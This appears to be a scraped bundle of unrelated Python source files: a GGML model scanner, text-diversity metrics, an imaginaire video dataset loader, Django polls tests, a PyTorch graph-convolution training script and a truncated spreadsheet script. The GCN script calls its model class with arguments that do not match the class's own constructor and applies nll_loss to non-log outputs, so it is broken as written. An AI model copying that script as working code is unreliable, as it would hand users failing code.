json.dumps(results)\n","repo_name":"xxl4tomxu98/redis-leaderboard-django","sub_path":"server/core/companies_redis.py","file_name":"companies_redis.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"40390989704","text":"import os\nimport io\nimport stat\nimport uuid\nimport struct\n\nfrom typing import IO\n#########################################################################\n# Functions for API calls\n#########################################################################\n\n\"\"\"\n- @ Scan directory find all models files\n- return list of models dict\n\"\"\"\n\ndef directory_scan(dir_path, ls_res):\n\n content = os.scandir(dir_path)\n\n for item in content:\n if item.is_file():\n\n (path, fl) = os.path.split(item.path)\n\n with open(item.path, \"rb\") as in_file :\n\n try:\n data = lazy_load_ggml_file(in_file)\n #print('vocab:{} embd:{} mult:{} head:{} layer:{} rot:{} file_type:{}'.format(\n # data[0],data[1],data[2],data[3],data[4],data[5],data[6]))\n\n dc_res = {}\n info = item.stat()\n dc_res['id'] = str(uuid.uuid5(uuid.NAMESPACE_DNS, fl))[:8]\n dc_res['name'] = fl\n dc_res['path'] = path\n dc_res['size'] = info.st_size\n\n dc_res['vocab']= data[0]\n dc_res['embd'] = data[1]\n dc_res['mult'] = data[2]\n dc_res['head'] = data[3]\n dc_res['layer']= data[4]\n dc_res['rot'] = data[5]\n dc_res['file_type'] = data[6]\n dc_res['active'] = False\n\n ls_res.append(dc_res)\n\n except Exception as ex:\n pass\n\n else:\n directory_scan(item.path, ls_res)\n\n#########################################################################\n\"\"\"\n- @ Read from file number of bytes\n- return byte array\n\"\"\"\n\ndef must_read(fp: IO[bytes], length: int) -> bytes:\n ret = fp.read(length)\n if len(ret) < length:\n raise Exception(\"unexpectedly reached end of file\")\n return ret\n\n#########################################################################\n\"\"\"\n- @ Read from file number of bytes\n- return byte array\n\"\"\"\n\ndef lazy_load_ggml_file(fp: io.BufferedReader) -> list:\n magic = must_read(fp, 4)[::-1]\n\n if magic in (b'ggjt',b'ggml'):\n version, = struct.unpack(\"i\", must_read(fp, 4))\n# assert version == 1\n else:\n assert magic == b'ggml'\n version = None\n\n n_vocab, n_embd, n_mult, n_head, n_layer, rot, file_type = struct.unpack('<7i', must_read(fp, 28))\n\n return [n_vocab, n_embd, n_mult, n_head, n_layer, rot, file_type]\n\n#########################################################################\n\"\"\"\n- @ Get file type descrition\n- return string\n\"\"\"\n\ndef file_type_str(tp: int) -> str:\n\n if tp == 0 :\n return 'ALL_F32'\n elif tp == 1 :\n return 'F16'\n elif tp == 2 :\n return 'Q4_0'\n elif tp == 3 :\n return 'Q4_1'\n elif tp == 4 :\n return 'Q4_1_SOME_F16'\n elif tp == 7 :\n return 'Q8_0'\n elif tp == 8 :\n return 'Q5_0'\n elif tp == 9 :\n return 'Q5_1'\n elif tp == 10 :\n return 'Q2_K'\n elif tp == 11 :\n return 'Q3_K_S'\n elif tp == 12 :\n return 'Q3_K_M'\n elif tp == 13 :\n return 'Q3_K_L'\n elif tp == 14 :\n return 'Q4_K_S'\n elif tp == 15 :\n return 'Q4_K_M'\n elif tp == 16 :\n return 'Q5_K_S'\n elif tp == 17 :\n return 'Q5_K_M'\n elif tp == 18 :\n return 'Q6_K'\n\n return \"UNK\"\n#########################################################################\n","repo_name":"pkarbov/nextcloud-llama-pod","sub_path":"llama_pod/services/llama/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10711926502","text":"import nltk\nimport numpy as np\nfrom nltk.translate.bleu_score import corpus_bleu\nimport argparse\nimport json\n\ndef distinct_4gram(rand_5):\n dist4_list = []\n for hyp5 in rand_5:\n hyp_4grams = []\n for hyp in hyp5:\n hyp_4grams += nltk.ngrams(hyp.split(), 4)\n total_4grams = len(hyp_4grams)\n unique_4grams = len(list(set(hyp_4grams)))\n if total_4grams == 0:\n continue\n dist_4 = unique_4grams/total_4grams\n dist4_list.append(dist_4)\n print('Distinct 4-grams:', np.mean(dist4_list))\n \ndef compute_self_bleu(rand_5):\n ref_list, hyp_list = [], []\n for i in range(len(rand_5)):\n hyp_all = rand_5[i]\n if len(hyp_all) < 2: continue\n for j, hyp in enumerate(hyp_all):\n cur_ref = hyp_all.copy()\n cur_ref.pop(j)\n tmp = []\n for ref in cur_ref:\n tmp.append(ref.split())\n ref_list.append(tmp)\n hyp_list.append(hyp.split())\n \n score = corpus_bleu(ref_list, hyp_list)\n print(\"Self-BLEU: \"+str(score))\n \n \ndef unique_sentence(rand_10):\n uni_list = []\n for i in range(len(rand_10)):\n all_sent_list = rand_10[i]\n uni_sents = list(set(all_sent_list))\n uni_list.append(len(uni_sents)/len(all_sent_list))\n \n uni = np.mean(uni_list)\n print('Number of Unique Sentences:', uni)\n \n \nif __name__ == '__main__':\n p = argparse.ArgumentParser(description='Hyperparams')\n p.add_argument('-op', '--output_path', type=str, default=\"../models/transformer/t5-base_GYAFC/\")\n p.add_argument('-of', '--output_file', type=str, default=\"em_ae_2021-09-09-13-13-04/outs.json\")\n args = p.parse_args()\n\n# rand_5 = [\n# ['you can now check on a facebook chatbot', 'you can now check this .', \n# 'you can now check on a facebook chatbot', 'you should check it on facebook',\n# 'please check on a facebook chatbot'],\n# ]\n# rand_10 = [\n# ['you can now check on a facebook chatbot', 'you can now check this .', \n# 'you can now check on a facebook chatbot', 'you should check it on facebook',\n# 'please check on a facebook chatbot', \n# 'you can now check on a facebook chatbot', 'you can now check this .', \n# 'you can now check on a facebook chatbot', 'you should check it on facebook',\n# 'please check on a facebook chatbot'],\n# ]\n\n with open(args.output_path + args.output_file, 'r') as f:\n outputs = json.load(f)['values']\n rand_5 = [output['generated'].split('\\t')[:5] for output in outputs]\n rand_10 = [output['generated'].split('\\t') for output in outputs]\n\n distinct_4gram(rand_5)\n compute_self_bleu(rand_5)\n unique_sentence(rand_10)","repo_name":"wyu-du/GP-VAE","sub_path":"metrics/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"73962830665","text":"import copy\nimport random\nfrom collections import OrderedDict\n\nimport torch\n\nfrom imaginaire.datasets.base import BaseDataset\nfrom imaginaire.model_utils.fs_vid2vid import select_object\nfrom imaginaire.utils.distributed import master_only_print as print\n\n\nclass Dataset(BaseDataset):\n r\"\"\"Paired video dataset for use in vid2vid, wc_vid2vid.\n\n Args:\n cfg (Config): Loaded config object.\n is_inference (bool): In train or inference mode?\n sequence_length (int): What sequence of images to provide?\n \"\"\"\n\n def __init__(self, cfg,\n is_inference=False,\n sequence_length=None,\n is_test=False):\n self.paired = True\n # Get initial sequence length.\n if sequence_length is None and not is_inference:\n self.sequence_length = cfg.data.train.initial_sequence_length\n elif sequence_length is None and is_inference:\n self.sequence_length = 2\n else:\n self.sequence_length = sequence_length\n super(Dataset, self).__init__(cfg, is_inference, is_test)\n self.set_sequence_length(self.sequence_length)\n self.is_video_dataset = True\n\n def get_label_lengths(self):\n r\"\"\"Get num channels of all labels to be concated.\n\n Returns:\n label_lengths (OrderedDict): Dict mapping image data_type to num\n channels.\n \"\"\"\n label_lengths = OrderedDict()\n for data_type in self.input_labels:\n data_cfg = self.cfgdata\n if hasattr(data_cfg, 'one_hot_num_classes') and data_type in data_cfg.one_hot_num_classes:\n label_lengths[data_type] = data_cfg.one_hot_num_classes[data_type]\n if getattr(data_cfg, 'use_dont_care', False):\n label_lengths[data_type] += 1\n else:\n label_lengths[data_type] = self.num_channels[data_type]\n return label_lengths\n\n def num_inference_sequences(self):\n r\"\"\"Number of sequences available for inference.\n\n Returns:\n (int)\n \"\"\"\n assert self.is_inference\n return len(self.mapping)\n\n def set_inference_sequence_idx(self, index):\n r\"\"\"Get frames from this sequence during inference.\n\n Args:\n index (int): Index of inference sequence.\n \"\"\"\n assert self.is_inference\n assert index < len(self.mapping)\n self.inference_sequence_idx = index\n self.epoch_length = len(\n self.mapping[self.inference_sequence_idx]['filenames'])\n\n def set_sequence_length(self, sequence_length):\n r\"\"\"Set the length of sequence you want as output from dataloader.\n\n Args:\n sequence_length (int): Length of output sequences.\n \"\"\"\n assert isinstance(sequence_length, int)\n if sequence_length > self.sequence_length_max:\n print('Requested sequence length (%d) > ' % (sequence_length) +\n 'max sequence length (%d). ' % (self.sequence_length_max) +\n 'Limiting sequence length to max sequence length.')\n sequence_length = self.sequence_length_max\n self.sequence_length = sequence_length\n # Recalculate mapping as some sequences might no longer be useful.\n self.mapping, self.epoch_length = self._create_mapping()\n print('Epoch length:', self.epoch_length)\n\n def _compute_dataset_stats(self):\n r\"\"\"Compute statistics of video sequence dataset.\n\n Returns:\n sequence_length_max (int): Maximum sequence length.\n \"\"\"\n print('Num datasets:', len(self.sequence_lists))\n\n if self.sequence_length >= 1:\n num_sequences, sequence_length_max = 0, 0\n for sequence in self.sequence_lists:\n for _, filenames in sequence.items():\n sequence_length_max = max(\n sequence_length_max, len(filenames))\n num_sequences += 1\n print('Num sequences:', num_sequences)\n print('Max sequence length:', sequence_length_max)\n self.sequence_length_max = sequence_length_max\n\n def _create_mapping(self):\n r\"\"\"Creates mapping from idx to key in LMDB.\n\n Returns:\n (tuple):\n - self.mapping (dict): Dict of seq_len to list of sequences.\n - self.epoch_length (int): Number of samples in an epoch.\n \"\"\"\n # Create dict mapping length to sequence.\n length_to_key, num_selected_seq = {}, 0\n total_num_of_frames = 0\n for lmdb_idx, sequence_list in enumerate(self.sequence_lists):\n for sequence_name, filenames in sequence_list.items():\n if len(filenames) >= self.sequence_length:\n total_num_of_frames += len(filenames)\n if len(filenames) not in length_to_key:\n length_to_key[len(filenames)] = []\n length_to_key[len(filenames)].append({\n 'lmdb_root': self.lmdb_roots[lmdb_idx],\n 'lmdb_idx': lmdb_idx,\n 'sequence_name': sequence_name,\n 'filenames': filenames,\n })\n num_selected_seq += 1\n self.mapping = length_to_key\n self.epoch_length = num_selected_seq\n if not self.is_inference and self.epoch_length < \\\n self.cfgdata.train.batch_size * 8:\n self.epoch_length = total_num_of_frames\n\n # At inference time, we want to use all sequences,\n # irrespective of length.\n if self.is_inference:\n sequence_list = []\n for key, sequences in self.mapping.items():\n sequence_list.extend(sequences)\n self.mapping = sequence_list\n\n return self.mapping, self.epoch_length\n\n def _sample_keys(self, index):\n r\"\"\"Gets files to load for this sample.\n\n Args:\n index (int): Index in [0, len(dataset)].\n Returns:\n key (dict):\n - lmdb_idx (int): Chosen LMDB dataset root.\n - sequence_name (str): Chosen sequence in chosen dataset.\n - filenames (list of str): Chosen filenames in chosen sequence.\n \"\"\"\n if self.is_inference:\n assert index < self.epoch_length\n chosen_sequence = self.mapping[self.inference_sequence_idx]\n chosen_filenames = [chosen_sequence['filenames'][index]]\n else:\n # Pick a time step for temporal augmentation.\n time_step = random.randint(1, self.augmentor.max_time_step)\n required_sequence_length = 1 + \\\n (self.sequence_length - 1) * time_step\n\n # If step is too large, default to step size of 1.\n if required_sequence_length > self.sequence_length_max:\n required_sequence_length = self.sequence_length\n time_step = 1\n\n # Find valid sequences.\n valid_sequences = []\n for sequence_length, sequences in self.mapping.items():\n if sequence_length >= required_sequence_length:\n valid_sequences.extend(sequences)\n\n # Pick a sequence.\n chosen_sequence = random.choice(valid_sequences)\n\n # Choose filenames.\n max_start_idx = len(chosen_sequence['filenames']) - \\\n required_sequence_length\n start_idx = random.randint(0, max_start_idx)\n\n chosen_filenames = chosen_sequence['filenames'][\n start_idx:start_idx + required_sequence_length:time_step]\n assert len(chosen_filenames) == self.sequence_length\n\n # Prepre output key.\n key = copy.deepcopy(chosen_sequence)\n key['filenames'] = chosen_filenames\n return key\n\n def _create_sequence_keys(self, sequence_name, filenames):\n r\"\"\"Create the LMDB key for this piece of information.\n\n Args:\n sequence_name (str): Which sequence from the chosen dataset.\n filenames (list of str): List of filenames in this sequence.\n Returns:\n keys (list): List of full keys.\n \"\"\"\n assert isinstance(filenames, list), 'Filenames should be a list.'\n keys = []\n if sequence_name.endswith('___') and sequence_name[-9:-6] == '___':\n sequence_name = sequence_name[:-9]\n for filename in filenames:\n keys.append('%s/%s' % (sequence_name, filename))\n return keys\n\n def _getitem(self, index):\n r\"\"\"Gets selected files.\n\n Args:\n index (int): Index into dataset.\n concat (bool): Concatenate all items in labels?\n Returns:\n data (dict): Dict with all chosen data_types.\n \"\"\"\n # Select a sample from the available data.\n keys = self._sample_keys(index)\n\n # Unpack keys.\n lmdb_idx = keys['lmdb_idx']\n sequence_name = keys['sequence_name']\n filenames = keys['filenames']\n\n # Get key and lmdbs.\n keys, lmdbs = {}, {}\n for data_type in self.dataset_data_types:\n keys[data_type] = self._create_sequence_keys(\n sequence_name, filenames)\n lmdbs[data_type] = self.lmdbs[data_type][lmdb_idx]\n\n # Load all data for this index.\n data = self.load_from_dataset(keys, lmdbs)\n\n # Apply ops pre augmentation.\n data = self.apply_ops(data, self.pre_aug_ops)\n\n # If multiple subjects exist in the data, only pick one to synthesize.\n data = select_object(data, obj_indices=None)\n\n # Do augmentations for images.\n data, is_flipped = self.perform_augmentation(data, paired=True, augment_ops=self.augmentor.augment_ops)\n\n # Apply ops post augmentation.\n data = self.apply_ops(data, self.post_aug_ops)\n data = self.apply_ops(data, self.full_data_post_aug_ops, full_data=True)\n\n # Convert images to tensor.\n data = self.to_tensor(data)\n\n # Pack the sequence of images.\n for data_type in self.image_data_types + self.hdr_image_data_types:\n for idx in range(len(data[data_type])):\n data[data_type][idx] = data[data_type][idx].unsqueeze(0)\n data[data_type] = torch.cat(data[data_type], dim=0)\n\n if not self.is_video_dataset:\n # Remove any extra dimensions.\n for data_type in self.data_types:\n if data_type in data:\n data[data_type] = data[data_type].squeeze(0)\n\n data['is_flipped'] = is_flipped\n data['key'] = keys\n data['original_h_w'] = torch.IntTensor([\n self.augmentor.original_h, self.augmentor.original_w])\n\n # Apply full data ops.\n data = self.apply_ops(data, self.full_data_ops, full_data=True)\n\n return data\n\n def __getitem__(self, index):\n return self._getitem(index)\n","repo_name":"NVlabs/imaginaire","sub_path":"imaginaire/datasets/paired_videos.py","file_name":"paired_videos.py","file_ext":"py","file_size_in_byte":10968,"program_lang":"python","lang":"en","doc_type":"code","stars":3891,"dataset":"github-code","pt":"81"} +{"seq_id":"21454414514","text":"import datetime\n\nfrom django.test import TestCase\nfrom django.utils import timezone\n\nfrom .models import Question\n\n# tutorial05\nfrom django.urls import reverse\n\n################################\n# For more info on all the asserts available in django.test.Testcase,\n# $ python manage.py shell\n# >>> from django.test import TestCase\n# >>> dir(TestCase())\n###############################\n\n# Running tests does not affect our actual database:\n# Creating test database for alias 'default'...\n# [...]\n# Destroying test database for alias 'default'...\n\n\n\n# tutorial05\n# Test methods must reside within a class that is a subclass\n# of django.test.TestCase; and must begin with keyword 'test'\n# \n# Here we have created a django.test.TestCase subclass.\n#\n# To run tests:\n# $ python manage.py test polls\n#\n# What happened is this:\n# - manage.py test polls looked for tests in the polls application\n# - it found a subclass of the django.test.TestCase class\n# - it created a special database for the purpose of testing\n# - it looked for test methods - ones whose names begin with test\n# - in test_was_published_recently_with_future_question it created a Question instance\n# whose pub_date field is 30 days in the future\n# ...and using the assertIs() method, it discovered that its was_published_recently()\n# returns True, though we wanted it to return False\n# The test informs us which test failed and even the line on which the failure occurred.\nclass QuestionModelTests(TestCase):\n\n # This test creates a Question instance with a pub_date in the future.\n # We then check the output of\n # was_published_recently() - which ought to be False.\n def test_was_published_recently_with_future_question(self):\n \"\"\"\n was_published_recently() returns False for questions whose pub_date\n is in the future.\n \"\"\"\n #print (\"test1\")\n time = timezone.now() + datetime.timedelta(days=30)\n future_question = Question(pub_date=time)\n self.assertIs(future_question.was_published_recently(), False)\n\n # Additional test case: older pub date\n def test_was_published_recently_with_old_question(self):\n \"\"\"\n was_published_recently() returns False for questions whose pub_date\n is older than 1 day.\n \"\"\"\n #print (\"test2\")\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_question = Question(pub_date=time)\n self.assertIs(old_question.was_published_recently(), False)\n\n # Additional test case: recent pub date\n def test_was_published_recently_with_recent_question(self):\n \"\"\"\n was_published_recently() returns True for questions whose pub_date\n is within the last day (23 hrs + 59 min + 59 sec).\n \"\"\"\n #print (\"test3\")\n time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)\n recent_question = Question(pub_date=time)\n self.assertIs(recent_question.was_published_recently(), True)\n\n######################\n# tutorial05\n# Testing our new index view (updated IndexView class in polls/views.py)\n\n# Helper function for our new test cases\n# *NOTE*: Any questions created here will not be committed to our database.\n# \"The database is reset for each test method, so the first question is no\n# longer there, and so again the index shouldn’t have any questions in it.\"\ndef create_question(question_text, days):\n \"\"\"\n Create a question with the given `question_text` and published the\n given number of `days` offset to now (negative for questions published\n in the past, positive for questions that have yet to be published).\n \"\"\"\n time = timezone.now() + datetime.timedelta(days=days)\n return Question.objects.create(question_text=question_text, pub_date=time)\n\n\nclass QuestionIndexViewTests(TestCase):\n def test_no_questions(self):\n \"\"\"\n If no questions exist, an appropriate message is displayed.\n \"\"\"\n response = self.client.get(reverse('polls:index'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"No polls are available.\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n def test_past_question(self):\n \"\"\"\n Questions with a pub_date in the past are displayed on the\n index page.\n \"\"\"\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['']\n )\n\n def test_future_question(self):\n \"\"\"\n Questions with a pub_date in the future aren't displayed on\n the index page.\n \"\"\"\n create_question(question_text=\"Future question.\", days=30)\n response = self.client.get(reverse('polls:index'))\n self.assertContains(response, \"No polls are available.\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n def test_future_question_and_past_question(self):\n \"\"\"\n Even if both past and future questions exist, only past questions\n are displayed.\n \"\"\"\n create_question(question_text=\"Past question.\", days=-30)\n create_question(question_text=\"Future question.\", days=30)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['']\n )\n\n def test_two_past_questions(self):\n \"\"\"\n The questions index page may display multiple questions.\n \"\"\"\n create_question(question_text=\"Past question 1.\", days=-30)\n create_question(question_text=\"Past question 2.\", days=-5)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['', '']\n )\n\n\n######################\n# tutorial05\n# Testing our new detail view (updated DetailView class in polls/views.py)\nclass QuestionDetailViewTests(TestCase):\n def test_future_question(self):\n \"\"\"\n The detail view of a question with a pub_date in the future\n returns a 404 not found.\n \"\"\"\n future_question = create_question(question_text='Future question.', days=5)\n url = reverse('polls:detail', args=(future_question.id,))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_past_question(self):\n \"\"\"\n The detail view of a question with a pub_date in the past\n displays the question's text.\n \"\"\"\n past_question = create_question(question_text='Past Question.', days=-5)\n url = reverse('polls:detail', args=(past_question.id,))\n response = self.client.get(url)\n self.assertContains(response, past_question.question_text)\n\n\n\n","repo_name":"jeffb4real/ovensensorweb","sub_path":"mysite/polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10372338124","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport math\n\nimport numpy as np\nimport scipy.sparse as sp\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.nn.parameter import Parameter\n\n\nclass GCN(nn.Module):\n # dropout_rate = 0.2\n\n def __init__(self, n_in, n_out, dropout_rate=None):\n super(GCN, self).__init__()\n self.graph1 = GraphConvolution(n_in, n_out)\n self.dropout_rate = dropout_rate\n\n def forward(self, x, adj):\n # adj是邻接矩阵\n out = F.relu(self.graph1(x, adj), inplace=True)\n if self.dropout_rate is not None:\n return F.dropout(out, self.dropout_rate, training=self.training)\n else:\n return out\n\n\nclass GraphConvolution(nn.Module):\n \"\"\"\n 使用pytorch实现的图卷积层\n \"\"\"\n def __init__(self, n_in, n_out, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = n_in\n self.out_features = n_out\n # 建立边权重\n self.weight = Parameter(torch.FloatTensor(n_in, n_out))\n if bias:\n self.bias = Parameter(torch.FloatTensor(n_out))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n \"\"\"\n 前向传播\n :param input: 输入数据\n :param adj: 邻接矩阵\n :return:\n \"\"\"\n # 两个矩阵相乘\n support = torch.mm(input, self.weight)\n # 左乘标准化的邻接矩阵\n # 于邻接矩阵的存储时用的是稀疏矩阵,所以有别于上一行\n # torch.spmm表示sparse_tensor与dense_tensor相乘。\n output = torch.spmm(adj, support)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\ndef encode_onehot(labels):\n \"\"\"onehot编码,将每个类别转成一个向量\"\"\"\n classes = set(labels)\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in\n enumerate(classes)}\n labels_onehot = np.array(list(map(classes_dict.get, labels)),\n dtype=np.int32)\n return labels_onehot\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n mx = r_mat_inv.dot(mx)\n return mx\n\n\ndef accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels)\n correct = preds.eq(labels).double()\n correct = correct.sum()\n return correct / len(labels)\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\n\n# Training settings\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\nparser.add_argument('--fastmode', action='store_true', default=False,\n help='Validate during training pass.')\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200,\n help='Number of epochs to train.')\nparser.add_argument('--lr', type=float, default=0.01,\n help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4,\n help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=16,\n help='Number of hidden units.')\nparser.add_argument('--dropout', type=float, default=0.5,\n help='Dropout rate (1 - keep probability).')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n\n# def load_data(path=\"../data/cora/\", dataset=\"cora\"):\ndef load_data(path=\"sample_data/cora/\", dataset=\"cora\"):\n \"\"\"\n 加载数据\n :param path: 数据的路径\n :param dataset: 数据集名\n :return:\n \"\"\"\n \"\"\"Load citation network dataset (cora only for now)\"\"\"\n print('Loading {} dataset...'.format(dataset))\n # 解析数据\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n # 从第2列到倒数第二列是特征数据\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n # 最后一列是标签数据\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # 索引数据\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n # 保存数据的索引,key是数据id,value是原数据中的位置(从0开始)。\n idx_map = {j: i for i, j in enumerate(idx)}\n # 加载数据\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n # 将数据压平,根据id找到对应的索引的位置\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n # 正规化特征数据\n features = normalize(features)\n adj = normalize(adj + sp.eye(adj.shape[0]))\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n features = torch.FloatTensor(np.array(features.todense()))\n labels = torch.LongTensor(np.where(labels)[1])\n # 将邻接矩阵转换为稀疏矩阵\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test\n\n\n# 加载数据\nadj, features, labels, idx_train, idx_val, idx_test = load_data()\n\n# 建立模型\nmodel = GCN(nfeat=features.shape[1],\n nhid=args.hidden,\n nclass=labels.max().item() + 1,\n dropout=args.dropout)\n# GCN的损失函数分为两部分,一部分是分类损失,一部分是权重的正则化。\noptimizer = optim.Adam(model.parameters(),\n lr=args.lr, weight_decay=args.weight_decay)\n\nif args.cuda:\n model.cuda()\n features = features.cuda()\n adj = adj.cuda()\n labels = labels.cuda()\n idx_train = idx_train.cuda()\n idx_val = idx_val.cuda()\n idx_test = idx_test.cuda()\n\n\ndef train(epoch):\n t = time.time()\n model.train()\n optimizer.zero_grad()\n # 将特征和邻接矩阵输入网络,得到输出的数据\n output = model(features, adj)\n # 计算损失\n loss_train = F.nll_loss(output[idx_train], labels[idx_train])\n # 计算正确率\n acc_train = accuracy(output[idx_train], labels[idx_train])\n # 反向传播\n loss_train.backward()\n optimizer.step()\n\n if not args.fastmode:\n # 进入评估模式\n model.eval()\n output = model(features, adj)\n\n loss_val = F.nll_loss(output[idx_val], labels[idx_val])\n acc_val = accuracy(output[idx_val], labels[idx_val])\n print('Epoch: {:04d}'.format(epoch + 1),\n 'loss_train: {:.4f}'.format(loss_train.item()),\n 'acc_train: {:.4f}'.format(acc_train.item()),\n 'loss_val: {:.4f}'.format(loss_val.item()),\n 'acc_val: {:.4f}'.format(acc_val.item()),\n 'time: {:.4f}s'.format(time.time() - t))\n\n\ndef test():\n \"\"\"测试数据\"\"\"\n model.eval()\n output = model(features, adj)\n loss_test = F.nll_loss(output[idx_test], labels[idx_test])\n acc_test = accuracy(output[idx_test], labels[idx_test])\n print(\"Test set results:\",\n \"loss= {:.4f}\".format(loss_test.item()),\n \"accuracy= {:.4f}\".format(acc_test.item()))\n\n\nimport time\n\nt_total = time.time()\nfor epoch in range(args.epochs):\n train(epoch)\nprint(\"Optimization Finished!\")\nprint(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))\n\n# Testing\ntest()\n","repo_name":"strawsyz/straw","sub_path":"my_cv/famous_netorks/GCN_pytorch/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"35920989898","text":"from openpyxl import Workbook\nimport argparse, string\n\ng_input_list = None\ng_output_path = None\ng_dry = False\ng_verbose = False\ndef getInputPath(l):\n\tglobal g_input_list\n\tg_input_list = l\n\ndef getOutputPath(path):\n\tglobal g_output_path\n\tg_output_path = path\n\nLABEL = {\n\t'Alternative': ['result/time(s)', 'input', 'Character Table Creation', 'sorting time', 'output', 'totoal', 'sort/total'],\n\t'Iterator': ['result/time(s)','input', 'sorting time', 'output', 'total', 'sort/total'],\n\t'Simple': ['result/time(s)','input', 'sorting time', 'output', 'total', 'sort/total']\n}\n\nCH = string.ascii_uppercase\n\ndef POS(i, j):\n\treturn CH[j] + str(i+1)\n\ndef createSheetLabel(st, name):\n\tname = name.split('_')[0]\n\tfor i in range(len(LABEL[name])):\n\t\tst[POS(0, i+1)] = LABEL[name][i]\n\nMAP = {}\ndef getMapAlpha(mm):\n\twith open('map_the_alpht.txt', 'r') as map_the_alpht_fp:\n\t\tlines = [x.split(': ') for x in map_the_alpht_fp.readlines()]\n\t\tmap_tmp = []\n\t\tfor i in range(18):\n\t\t\tmap_tmp.append(lines[i][1].strip())\n\t\tmm['line'] = map_tmp\n\t\tmap_tmp = []\n\t\tfor i in range(19, 37):\n\t\t\tmap_tmp.append(lines[i][1].strip())\n\t\tmm['len'] = map_tmp\n\n\ng_file_name = {'line': 'data_line.txt', 'len': 'data_len.txt'}\ng_type = ['line', 'len']\ndef process():\n\t'''\n\tprocess the data (line, len) and gen a .xlsx file\n\t'''\n\tgetMapAlpha(MAP)\n\twb = Workbook()\n\twb.remove(wb.active)\n\tfor i in g_input_list:\n\t\tfor j in g_type:\n\t\t\tnow = '{}_{}'.format(i, j)\n\t\t\tprint('Creating sheet {}'.format(now))\n\t\t\t# if dry run, then don't do anything\n\t\t\tif g_dry:\n\t\t\t\tcontinue\n\n\t\t\tsheet = wb.create_sheet(now)\n\t\t\tcreateSheetLabel(sheet, now)\n\n\t\t\ttry:\n\t\t\t\tprint('>> {}'.format(i))\n\t\t\t\twith open('result/' + i + '/' + g_file_name[j], 'r') as f:\n\t\t\t\t\tdata = [x.split() for x in 